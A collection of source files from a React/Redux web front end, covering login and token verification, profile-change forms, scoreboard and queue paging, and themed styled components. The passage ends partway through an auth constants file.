<file_sep>/src/components/profile/PersonalInformationPage/ChangeUsernameForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import { signupActions } from '../../../actions/content/signup'
import Button from '../../../styled-components/defaults/Button'
const validate = values => {
const errors = {}
if (!values.username) {
errors.username = 'Required'
}
return errors
}
const submit = (values, dispatch, props) => {
dispatch(personalInformationPageActions.filled('username',values))
}
let ChangeUsernameForm = (props) => (
<form onSubmit={props.handleSubmit}>
Change Username
<div>
<Field name="username" component={renderField} type="text" placeholder="New username"/>
</div>
<Button type="submit">Submit</Button>
</form>
)
ChangeUsernameForm = reduxForm({
form: 'changeUsername',
validate,
onSubmit: submit,
asyncBlurFields: ['username'],
asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangeUsernameForm)
export default ChangeUsernameForm<file_sep>/src/reducers/content/profile/activityPage.jsx
import { activityPageConstants } from '../../../constants/content/profile/activityPage'
const defaultState = {
entries: [],
paging: {
page: 0,
hasMore: true
}
}
function activityPageReducer(state = defaultState, action) {
const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
switch (action.type) {
case activityPageConstants.SET_ACTIVE_PAGE_REQUEST:
return {
entries: state.entries,
loading: true,
paging: {
page: state.paging.page
}
}
case activityPageConstants.SET_ACTIVE_PAGE_SUCCESS:
const newEntries = state.entries
newEntries[activePage - 1] = action.data || []
return {
entries: newEntries.slice(0,activePage),
paging: {
// If there was no data, dont update
page: (action.data && action.data.length > 0) ? activePage : state.paging.page,
hasMore: action.hasMore
},
}
case activityPageConstants.SET_ACTIVE_PAGE_FAILED:
return {
message: action.message,
paging: {
...state.paging,
hasMore: false
},
entries: state.entries
}
case activityPageConstants.SET_USER:
return state.user === action.user ? state : {
...defaultState,
user: action.user
}
case activityPageConstants.RESET:
return defaultState
default:
return state
}
}
export default activityPageReducer<file_sep>/src/actions/content/statistics/scoreboardPage.jsx
import { appConfig } from '../../../appConfig'
import { scoreboardPageConstants } from '../../../constants/content/statistics/scoreboardPage'
import { messageType } from '../../../constants/misc/backendMessageTypes'
function setActivePage(queue, pageIndex) {
const request = (activePage) => ({ type: scoreboardPageConstants.LOAD_PAGE_REQUEST, queue, activePage })
const success = (queue, activePage, data) => ({ type: scoreboardPageConstants.LOAD_PAGE_SUCCESS, queue, activePage, data })
const failure = (message) => ({ type: scoreboardPageConstants.LOAD_PAGE_FAILED, queue, message, messageType: messageType.ERROR })
return dispatch => {
if (!queue) {
return failure('No queue specified')
}
dispatch(request(pageIndex));
var requestUrl = appConfig.backendUrl + "/queue/" + queue + '/scoreboard'
requestUrl += (pageIndex && pageIndex > 0) ? "?page=" + pageIndex : ""
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
// NOTE: perhaps parse 304 statuses, so more efficient
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(queue, pageIndex, body.data))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
function findUser(queue, username, recordsPerPage) {
const request = () => ({ type: scoreboardPageConstants.USER_SEARCH_REQUEST, queue })
const success = (username, activePage) => ({ type: scoreboardPageConstants.USER_SEARCH_SUCCESS, queue, username, activePage })
const failure = (message) => ({ type: scoreboardPageConstants.USER_SEARCH_FAILED, queue, message, messageType: messageType.ERROR })
if(!queue) {
return failure('No queue specified')
}
if(!username) {
return failure('No username specified')
}
if(!recordsPerPage) {
recordsPerPage = 50
}
return dispatch => {
dispatch(request());
const requestUrl = appConfig.backendUrl + "/queue/" + queue + '/scoreboard/position/' + username
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
// NOTE: perhaps parse 304 statuses, so more efficient
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
if (!body.position) {
return dispatch(failure('User "' + username + '" has no score in queue "' + queue + '"'))
}
dispatch(success(username, Math.floor(((body.position - 1) / recordsPerPage) + 1)))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
function getNumberOfPages(queue) {
const request = () => ({ type: scoreboardPageConstants.USER_COUNT_REQUEST, queue })
const success = (pageCount) => ({ type: scoreboardPageConstants.USER_COUNT_SUCCESS, queue, pageCount })
const failure = (message) => ({ type: scoreboardPageConstants.USER_COUNT_FAILED, queue, message, messageType: messageType.ERROR })
if(!queue) {
return failure('No queue specified')
}
return dispatch => {
dispatch(request());
const requestUrl = appConfig.backendUrl + "/queue/" + queue + '/user_count'
fetch(requestUrl, {
method: 'GET',
headers: { 'Content-Type': 'application/json' }
}).then(response => {
// NOTE: perhaps parse 304 statuses, so more efficient
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
const page_count = (Math.floor(body.body_count / 50)) + 1
dispatch(success(page_count))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
}
function reset() {
return {
type: scoreboardPageConstants.RESET
}
}
function validateUserExists(username) {
return new Promise((resolve, reject) => {
fetch(appConfig.backendUrl + "/u/exists", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({user: username})
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return resolve()
}
return reject({identifier: 'User "' + username + '" does not exists'})
})
})
}
export const scoreboardPageActions = {
setActivePage,
findUser,
getNumberOfPages,
reset,
validateUserExists
}
<file_sep>/src/styled-components/problem/ProblemDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedProblemDiv = styled.div`
width: 90%;
margin: auto auto 50px auto;
a {
display: inline-block;
text-decoration: none;
color: rgb(67, 0, 50);
font-style: italic;
}
a:hover {
text-decoration: underline;
}
input {
margin: 5px;
}
font-size: 15px;
`
const TryhardProblemDiv = props => <div {...props}/>
const ProblemDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedProblemDiv {...props} />}
tryhard={<TryhardProblemDiv {...props} />}
/>
export default ProblemDiv<file_sep>/src/actions/auth.jsx
import { authConstants } from '../constants/auth'
import { messageType } from '../constants/misc/backendMessageTypes'
import { appConfig } from '../appConfig'
export const authActions = {
login,
logout,
verify
};
function login(username, password) {
if (!username) {
return {
type: authConstants.LOGIN_FAILURE,
message: 'Missing username',
messageType: messageType.ERROR
}
}
if (!password) {
return {
type: authConstants.LOGIN_FAILURE,
message: 'Missing password',
messageType: messageType.ERROR
}
}
return dispatch => {
dispatch(request({ username }));
// 2. parse result und depending on that stuff, dispatch success/failure action/reducer idk
fetch(appConfig.backendUrl + "/signin", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ username, password })
}).then(response => {
if (response.status >= 200 && response.status < 400){
return response
} else {
var error = new Error(response.statusText)
error.response = response;
throw error;
}
}).then(response => {
return response.json()
})
.then(response => {
// TODO: verify 401 status as decide between server and client error
localStorage.setItem('token', JSON.stringify(response.token));
dispatch(success(response.user, response.token))
}).catch(error => {
dispatch(invalid_credentials(error))
})
};
function request(user) { return { type: authConstants.LOGIN_REQUEST, user: user } }
function success(user, token) { return { type: authConstants.LOGIN_SUCCESS, user, token} }
function invalid_credentials(error) { return { type: authConstants.LOGIN_INVALID_CREDENTIALS, error: error, messageType: messageType.ERROR } }
}
function logout(token) {
// NOTE: dunno what this does but looks cool
/*
fetch(appConfig.backendUrl + "/logout", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ username, password })
})
*/
fetch(appConfig.backendUrl + "/logout", {
method: 'POST',
headers: {
'Content-Type' : 'application/json',
'Authorization' : 'Bearer ' + token
}
}).catch(error => console.log(error));
localStorage.removeItem('token')
return { type: authConstants.LOGOUT };
}
function verify(token) {
if (!token) {
return no_token()
}
return dispatch => {
dispatch(request(token))
fetch(appConfig.backendUrl + "/verify/login", {
method: 'POST',
headers: {
'Content-Type' : 'application/json',
'Authorization' : 'Bearer ' + token
}
}).then(response => {
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response;
throw error;
}
}).then(response => {
return response.json()
}).then(response => {
dispatch(success(response.user, response.token))
}
).catch(error => {
dispatch(token_expired())
})
}
function request(token) { return { type: authConstants.TOKEN_VERIFY_REQUEST, token }}
function success(user, token) { return { type: authConstants.TOKEN_VERIFIED, user, token} }
function token_expired() { return { type: authConstants.TOKEN_EXPIRED } }
function no_token() { return {type: authConstants.LOGOUT} }
}
<file_sep>/src/actions/content/profile/personalInformationPage.jsx
import { appConfig } from '../../../appConfig'
import { personalInformationPageConstants } from '../../../constants/content/profile/personalInformationPage'
import { messageType } from '../../../constants/misc/backendMessageTypes'
function filled(form, values) {
return {
type: personalInformationPageConstants.REQUEST_FORM_FILLED,
form,
values
}
}
function confirmPassword(password, form, authToken) {
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/confirmPassword", {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + authToken
},
body: JSON.stringify({password})
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(res => {
dispatch(success(form))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
function request() { return { type: personalInformationPageConstants.CONFIRM_PASSWORD_REQUEST } }
function success(form) {
switch(form) {
case 'email':
return {
type: personalInformationPageConstants.CHANGE_EMAIL_REQUEST
}
case 'username':
return {
type: personalInformationPageConstants.CHANGE_USERNAME_REQUEST
}
case 'password':
return {
type: personalInformationPageConstants.CHANGE_PASSWORD_REQUEST
}
case 'names':
return {
type: personalInformationPageConstants.CHANGE_NAMES_REQUEST
}
default:
return {
type: personalInformationPageConstants.CONFIRM_PASSWORD_FAILED,
message: 'idk wut happened, but suddenli form parameter is nul',
messageType: messageType.ERROR
}
}
}
function failure(message) { return { type: personalInformationPageConstants.CONFIRM_PASSWORD_FAILED, message, messageType: messageType.ERROR } }
}
function submitEmailChange(newEmail, authToken) {
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/u/emailChange", {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + authToken
},
body: JSON.stringify({newEmail})
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(user => {
dispatch(success())
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
function request() { return { type: personalInformationPageConstants.CHANGE_EMAIL_REQUEST } }
function success() { return { type: personalInformationPageConstants.CHANGE_EMAIL_SUCCESS} }
function failure(message) { return { type: personalInformationPageConstants.CHANGE_EMAIL_FAILED, message, messageType: messageType.ERROR } }
}
function submitUsernameChange(newUsername, authToken) {
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/u/usernameChange", {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + authToken
},
body: JSON.stringify({newUsername})
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(user => {
dispatch(success())
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
function request() { return { type: personalInformationPageConstants.CHANGE_USERNAME_REQUEST } }
function success() { return { type: personalInformationPageConstants.CHANGE_USERNAME_SUCCESS} }
function failure(message) { return { type: personalInformationPageConstants.CHANGE_USERNAME_FAILED, message, messageType: messageType.ERROR } }
}
function submitNamesChange(newFirstName, newLastName, authToken) {
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/u/namesChange", {
method: 'POST',
headers: {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + authToken
},
body: JSON.stringify({newFirstName, newLastName})
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(user => {
dispatch(success())
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
function request() { return { type: personalInformationPageConstants.CHANGE_NAMES_REQUEST } }
function success() { return { type: personalInformationPageConstants.CHANGE_NAMES_SUCCESS} }
function failure(message) { return { type: personalInformationPageConstants.CHANGE_NAMES_FAILED, message, messageType: messageType.ERROR } }
}
function submitPasswordChange(user) {
if (!user) {
return failure('Attempted request with no username/email')
}
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/u/passwordReset/request", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({user})
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body.user))
}).catch(error => {
dispatch(failure(JSON.stringify(error)))
})
}
function request() { return { type: personalInformationPageConstants.CHANGE_PASSWORD_REQUEST } }
function success(user) { return { type: personalInformationPageConstants.CHANGE_PASSWORD_SUCCESS, user} }
function failure(message) { return { type: personalInformationPageConstants.CHANGE_PASSWORD_FAILED, message, messageType: messageType.ERROR } }
}
function reset() {
return {
type: personalInformationPageConstants.RESET
}
}
export const personalInformationPageActions = {
filled,
confirmPassword,
submitEmailChange,
submitUsernameChange,
submitNamesChange,
submitPasswordChange,
reset
}
<file_sep>/src/components/routes/NonAuthRoute.jsx
import React from "react"
import { Route, Redirect } from "react-router-dom";
import history from '../../history'
const NonAuthRoute = ({loggedIn, render, ...rest}) => {
return (
<Route
{...rest}
render={(routeProps) => {
return loggedIn ?
<Redirect
to={{
pathname: "/logout",
state: { from: history.location.pathname }
}}
/>
: render(routeProps)
}
}
/>
);
}
export default NonAuthRoute<file_sep>/src/constants/content/confirm/usernameChange.jsx
export const confirmUsernameChangeConstants = {
REQUEST: "CONFIRM_USERNAME_CHANGE_REQUEST",
SUCCESS: "CONFIRM_USERNAME_CHANGE_SUCCESS",
FAILED: "CONFIRM_USERNAME_CHANGE_FAILED"
}<file_sep>/src/components/profile/PersonalInformationPage/ChangePasswordForm.jsx
import React from 'react'
import { reduxForm } from 'redux-form'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import Button from '../../../styled-components/defaults/Button'
const submit = (values, dispatch, props) => {
dispatch(personalInformationPageActions.filled('password',values))
}
let ChangePasswordForm = (props) => (
<form onSubmit={props.handleSubmit}>
<div>
Password reset - email with a link will be sent
</div>
<Button type="submit">Send password reset link</Button>
</form>
)
ChangePasswordForm = reduxForm({
form: 'changePassword',
onSubmit: submit,
getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangePasswordForm)
export default ChangePasswordForm<file_sep>/src/actions/content/forgotPwdPage.jsx
import { forgotPwdConstants } from '../../constants/content/forgotPwdPage'
import { appConfig } from '../../appConfig'
import { messageType } from '../../constants/misc/backendMessageTypes'
export const forgotPwdActions = {
forgotPwd,
reset
};
function forgotPwd(user) {
if (!user) {
return failed('Attempted request with no username/email')
}
return dispatch => {
dispatch(request());
fetch(appConfig.backendUrl + "/u/passwordReset/request", {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({user})
}).then(response => {
// NOTE: refactor this
if (response.status >= 200 && response.status < 400) {
return response
} else {
var error = new Error(response.statusText)
error.response = response
throw error
}
}).then(response => response.json())
.then(body => {
dispatch(success(body.user))
}).catch(error => {
dispatch(failed(JSON.stringify(error)))
})
}
function request() { return { type: forgotPwdConstants.REQUEST } }
function success(user) { return { type: forgotPwdConstants.SUCCESS, user } }
function failed(message) { return { type: forgotPwdConstants.FAILED, message, messageType: messageType.ERROR } }
}
function reset() {
return {
type: forgotPwdConstants.RESET
}
}
<file_sep>/src/styled-components/problem/ContentInfo.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedContentInfo = styled.div`
display: flex;
flex-wrap: wrap;
${props => props.end && 'justify-content: flex-end;'}
align-content: center;
margin: 0px 2px 2px 2px;
border-bottom: 1px solid grey;
h3 {
flex-grow: 1;
margin-left: 0px;
margin-bottom: 0px;
}
* {
margin-left: 7px;
}
`
const TryhardContentInfo = props => <div {...props} end={undefined}/>
const ContentInfo = props => <ThemeSelector
buzzfeed={<BuzzfeedContentInfo {...props} />}
tryhard={<TryhardContentInfo {...props} />}
/>
export default ContentInfo<file_sep>/src/components/problem/BoostPage/BoostForm.jsx
import React from 'react'
import { boostActions } from '../../../actions/content/boost'
import { Field, reduxForm } from 'redux-form'
import FormButton from '../../../styled-components/form/FormButton'
import renderField from '../../form/RenderField'
let boost = (values, dispatch, props) => {
dispatch(
boostActions
.boost({value: values.boost, problemId: props.problemId}, props.token)
)
}
const number = value =>
isNaN(Number(value)) ? 'Must be a number' : undefined
const positive = value =>
value > 0 ? undefined : 'Must be a positive number'
let BoostForm = props => {
const { handleSubmit } = props;
return (<form onSubmit={handleSubmit}>
<div>
<Field name="boost" label="Boost Value" component={renderField} validate={[number, positive]} type="number" step="any" alignLeft/>
</div>
<FormButton type="submit" alignLeft>Boost!</FormButton>
</form>)
}
BoostForm = reduxForm({
form: 'form',
onSubmit: boost,
getFormState: ({content}) => content.boost.form
})(BoostForm)
export default BoostForm
<file_sep>/src/components/problem/ProblemPage/PostReplyForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import { problemPageActions } from '../../../actions/content/problemPage'
import Button from '../../../styled-components/defaults/Button'
import renderTextArea from '../../form/RenderTextArea'
const submit = (values, dispatch, props) => {
dispatch(problemPageActions.replySubmission({content: values.content, submission: props.submission, problem: props.problem}, props.token))
}
let PostReplyForm = props => {
const { handleSubmit } = props;
return (<form onSubmit={handleSubmit}>
<div>
<Field name="content" component={renderTextArea} type="text"/>
</div>
<Button type="submit">Submit</Button>
</form>)
}
PostReplyForm = reduxForm({
form: 'reply',
onSubmit: submit,
getFormState: ({content}) => content.problemPage.form
})(PostReplyForm)
export default PostReplyForm<file_sep>/src/reducers/content/signupPage.jsx
import { reducer } from 'redux-form'
import { combineReducers } from 'redux'
import { signupConstants, signupStages } from '../../constants/content/signUpPage'
import { appConfig } from '../../appConfig'
const initialState = {
stage: signupStages.SUBMITTING_FORM
}
const signupPageReducer = (state = initialState, action) => {
switch (action.type) {
case signupConstants.REQUEST:
return {stage: signupStages.SUBMITTING_FORM, message: "Waiting for server response"}
case signupConstants.SUCCESS:
return {
stage: signupStages.COMPLETED,
message: {
message: appConfig.productionMail ? "Confermation link sent ;) pls check ur email adress, YUH!" : "Ok now that you've regoostered, this is a demo version that uses only testing mail service for user receiving emails, since we cannot afford SMTP server.\nThat means, to complete the process",
steps: appConfig.productionMail ? [] : [
"go to \"https://ethereal.email\"",
"log in with following credentials:\n\tusername=\"<EMAIL>\",\n\tpassword=\"<PASSWORD>\"",
"in section messages should be your email, i.e. addressed to \"" + action.user.username + "\" with email adress \"" + action.user.email + "\""
]
},
messageType: action.messageType
}
case signupConstants.FAILED:
return {stage: signupStages.SUBMITTING_FORM, message: action.message, messageType: action.messageType }
case signupConstants.RESET:
return initialState
default:
return state
}
}
const signupFormReducer = reducer;
export default combineReducers({
page: signupPageReducer,
form: signupFormReducer
})
<file_sep>/src/components/profile/PersonalInformationPage/ChangeEmailForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import { signupActions } from '../../../actions/content/signup'
import Button from '../../../styled-components/defaults/Button'
const validate = values => {
const errors = {}
if (!values.email) {
errors.email = 'Required'
}
return errors
}
const submit = (values, dispatch, props) => {
dispatch(personalInformationPageActions.filled('email',values))
}
let ChangeEmailForm = (props) => (
<form onSubmit={props.handleSubmit}>
Change Email
<Field name="email" component={renderField} type="text" placeholder="New Email"/>
<Button type="submit">Submit</Button>
</form>
)
ChangeEmailForm = reduxForm({
form: 'changeEmail',
validate,
onSubmit: submit,
asyncBlurFields: ['email'],
asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangeEmailForm)
export default ChangeEmailForm;<file_sep>/src/styled-components/profile/TransactionBoxMetaSection.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTransactionBoxMetaSection = styled.span`
${props => props.grow && 'flex-grow: 1;'}
margin-right: 10px;
`
const TryhardTransactionBoxMetaSection = props => <span {...props} grow={undefined}/>
const TransactionBoxMetaSection = props => <ThemeSelector
buzzfeed={<BuzzfeedTransactionBoxMetaSection {...props} />}
tryhard={<TryhardTransactionBoxMetaSection {...props} />}
/>
export default TransactionBoxMetaSection<file_sep>/src/components/profile/TransactionPage.jsx
import React from 'react';
import ProfileSidebar from './ProfileSidebar'
import { connect } from 'react-redux'
import InfiniteScroll from 'react-infinite-scroller';
import TransactionBox from './TransactionPage/TransactionBox'
import { transactionPageActions } from '../../actions/content/profile/transactionPage'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import TransactionBoxWrapper from '../../styled-components/profile/TransactionBoxWrapper'
const mapDispatchToProps = (dispatch, ownProps) => ({
loadPage: (page) => dispatch(transactionPageActions.setActivePage(ownProps.token, page)),
reset: () => dispatch(transactionPageActions.reset())
})
const mapStateToProps = (state, ownProps) => {
const pageState = state.content.profile.transactionPage
return {
...pageState,
entries: pageState.entries.reduce((acc, cv) => acc.concat(cv),[]) || [],
...ownProps
}
}
class TransactionPage extends React.Component {
componentWillUnmount() {
this.props.reset()
}
componentDidMount() {
this.props.loadPage(1)
}
render() {
const empty = this.props.entries.length === 0
if (empty) {
return (
<PageDiv>
<ProfileSidebar baseUrl={'/u/' + this.props.user} auth_view/>
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>{this.props.loading ? "Loading" : "User " + this.props.user + " has yet no transactions"}</h3>
</CenteredDiv>
</ContentDiv>
</PageDiv>
)
}
return (
<PageDiv>
<ProfileSidebar baseUrl={'/u/' + this.props.user} auth_view/>
<ContentDiv sidebar>
<CenteredDiv fullWidth>
<h3>{"Transactions of user " + this.props.user}</h3>
</CenteredDiv>
<TransactionBoxWrapper>
<InfiniteScroll
pageStart={1}
loadMore={() => {
this.props.loadPage(this.props.paging.page + 1)
}}
hasMore={this.props.paging.hasMore}
loader={<div className="loader" key={0}>Loading ...</div>}
>
<ul>
{
this.props.entries.map((p,index) => (
<li key={index}><TransactionBox {...p}/></li>
))}
</ul>
</InfiniteScroll>
</TransactionBoxWrapper>
</ContentDiv>
</PageDiv>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(TransactionPage);
<file_sep>/src/components/profile/PersonalInformationPage/ChangeNamesForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { personalInformationPageActions } from '../../../actions/content/profile/personalInformationPage'
import Button from '../../../styled-components/defaults/Button'
const submit = (values, dispatch, props) => {
dispatch(personalInformationPageActions.filled('names',values))
}
let ChangeNamesForm = (props) => (
<form onSubmit={props.handleSubmit}>
<div>
Change Names
<Field name="firstName" component={renderField} type="text" placeholder="<NAME>"/>
<Field name="lastName" component={renderField} type="text" placeholder="<NAME>"/>
</div>
<Button type="submit">Submit</Button>
</form>
)
ChangeNamesForm = reduxForm({
form: 'changeNames',
onSubmit: submit,
getFormState: ({content}) => content.profile.personalInformationPage.form
})(ChangeNamesForm)
export default ChangeNamesForm<file_sep>/src/constants/content/statistics/scoreboardPage.jsx
export const scoreboardPageConstants = {
LOAD_PAGE_REQUEST: 'SCOREBOARD_PAGE_LOAD_PAGE_REQUEST',
LOAD_PAGE_SUCCESS: 'SCOREBOARD_PAGE_LOAD_PAGE_SUCCESS',
LOAD_PAGE_FAILED: 'SCOREBOARD_PAGE_LOAD_PAGE_FAILED',
USER_SEARCH_REQUEST: 'SCOREBOARD_PAGE_USER_SEARCH_REQUEST',
USER_SEARCH_SUCCESS: 'SCOREBOARD_PAGE_USER_SEARCH_SUCCESS',
USER_SEARCH_FAILED: 'SCOREBOARD_PAGE_USER_SEARCH_FAILED',
USER_COUNT_REQUEST: 'SCOREBOARD_PAGE_USER_COUNT_REQUEST',
USER_COUNT_SUCCESS: 'SCOREBOARD_PAGE_USER_COUNT_SUCCESS',
USER_COUNT_FAILED: 'SCOREBOARD_PAGE_USER_COUNT_FAILED',
RESET: 'SCOREBOARD_PAGE_RESET'
}<file_sep>/src/reducers/content/queuePage.jsx
import { queuePageConstants } from '../../constants/content/queuePage'
const defaultQueueState = {
entries: [],
paging: {
page: 0
}
}
const defaultState = {}
function singleQueueReducer(state = defaultQueueState, action) {
const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
switch (action.type) {
case queuePageConstants.SET_ACTIVE_PAGE_REQUEST:
return {
loading: true,
entries: state.entries,
paging: {
page: state.paging.page
}
}
case queuePageConstants.SET_ACTIVE_PAGE_SUCCESS:
const newEntries = state.entries
newEntries[activePage - 1] = action.data || []
return {
entries: newEntries.slice(0,activePage),
paging: {
// If there was no data, dont update
page: (action.data && action.data.length > 0) ? activePage : state.paging.page,
hasMore: action.hasMore
},
}
case queuePageConstants.NETWORK_ERROR:
return {
message: action.message,
messageType: action.messageType,
paging: {
...state.paging,
hasMore: false
},
entries: state.entries
}
case queuePageConstants.SET_ACTIVE_ENTRY:
return {
entries: state,
paging: {
page: activePage,
entry: action.activeEntry,
hasMore: state.hasMore
}
}
default:
return state
}
}
export default function queuePageReducer(state = defaultState, action) {
// tried to solve this for 5 hours, when state is modified directly redux does not detect change :)
if (action.type === queuePageConstants.RESET) {
return defaultState
}
const newState = {...state}
if (action.queue) {
newState[action.queue] = singleQueueReducer(state[action.queue] || defaultQueueState, action)
}
return newState
}
<file_sep>/src/styled-components/problem/RepliesButtonDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ButtonDiv from '../defaults/ButtonDiv'
import ThemeSelector from '../ThemeSelector'
const BuzzfeedRepliesButtonDiv = styled(ButtonDiv)`
margin-left: 10%;
`
const TryhardRepliesButtonDiv = props => <button {...props} />
const RepliesButtonDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedRepliesButtonDiv {...props} />}
tryhard={<TryhardRepliesButtonDiv {...props} />}
/>
export default RepliesButtonDiv;
<file_sep>/src/components/queue/QueueSidebar.jsx
import React from 'react';
import { connect } from 'react-redux'
import QueueSidebarEntries from './QueueSidebarEntries'
import { globalActions } from '../../actions/global'
import SidebarDiv from '../../styled-components/sidebars/Sidebar'
import HierarchicalListDiv from '../../styled-components/sidebars/HierarchicalListDiv'
import CollapsedSidebarDiv from '../../styled-components/sidebars/CollapsedSidebar'
import QueueDropdown from './QueueDropdown'
const mapStateToProps = state => ({
hierarchy: state.global.hierarchy,
})
const mapDispatchToProps = dispatch => ({
loadHierarchy: () => dispatch(globalActions.hierarchy()),
loadLinQueues: () => dispatch(globalActions.queues())
})
class QueueSidebar extends React.Component {
componentDidMount() {
this.props.loadLinQueues()
this.props.loadHierarchy()
}
render() {
const hierarchicalEntries = <QueueSidebarEntries baseUrl={this.props.baseUrl || '/q'} queues={this.props.hierarchy} />
const dropdownEntries = <QueueDropdown baseUrl={this.props.baseUrl || '/q'}/>
if (this.props.reuse) {
return (
<div>
<HierarchicalListDiv>
{hierarchicalEntries}
</HierarchicalListDiv>
<CollapsedSidebarDiv>
{dropdownEntries}
</CollapsedSidebarDiv>
</div>
)
}
return (
<div>
<CollapsedSidebarDiv>
{dropdownEntries}
</CollapsedSidebarDiv>
<SidebarDiv>
<HierarchicalListDiv>
{hierarchicalEntries}
</HierarchicalListDiv>
</SidebarDiv>
</div>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(QueueSidebar)<file_sep>/src/reducers/content/profile/premiumPage.jsx
import { premiumPageConstants } from '../../../constants/content/profile/premiumPage'
const defaultState = {
premiumActive: false,
text: 'Sumscribe to premium'
}
function premiumPageReducer(state=defaultState, action) {
switch (action.type) {
case premiumPageConstants.SUBSCRIBE:
return {
premiumActive: true,
text: 'You\'ve just sumscribed to premium, it duznt really contain any benefits, click down below to unsubscribe for special reward'
}
case premiumPageConstants.UNSUBSCRIBE:
return {
premiumActive: false,
text: 'You\'ve just unsubscribed from premium, hopw you had fun.. click down below to sumscrible again'
}
default:
return state
}
}
export default premiumPageReducer<file_sep>/src/components/problem/ProblemPage/PostSubmission.jsx
import React from 'react';
import { connect } from 'react-redux';
import MarkdownRender from '../../form/MarkdownRender'
import PostSubmissionForm from './PostSubmissionForm'
import { problemPageActions } from '../../../actions/content/problemPage'
const mapStateToProps = (state, ownProps) => {
if (!state.content.problemPage.form.submission) {
return ownProps
}
return {
form: state.content.problemPage.form.submission,
...ownProps
}
}
const mapDispatchToProps = (dispatch, ownProps) => ({
postSubmission: (submission, token) => dispatch(problemPageActions.postSubmission(submission, token))
})
class PostSubmissionComponent extends React.Component {
render() {
const token = this.props.token
const sForm = this.props.form
const problemId = this.props.problemId
return (
<div>
<PostSubmissionForm token={token} problem={problemId} />
{
sForm && sForm.values && (
<div>
{(sForm.values.content) && <p>Preview</p>}
<MarkdownRender source={sForm.values.content} />
</div>
)
}
</div>
)
}
}
export default connect(mapStateToProps, mapDispatchToProps)(PostSubmissionComponent)
<file_sep>/src/constants/auth.jsx
export const authConstants = {
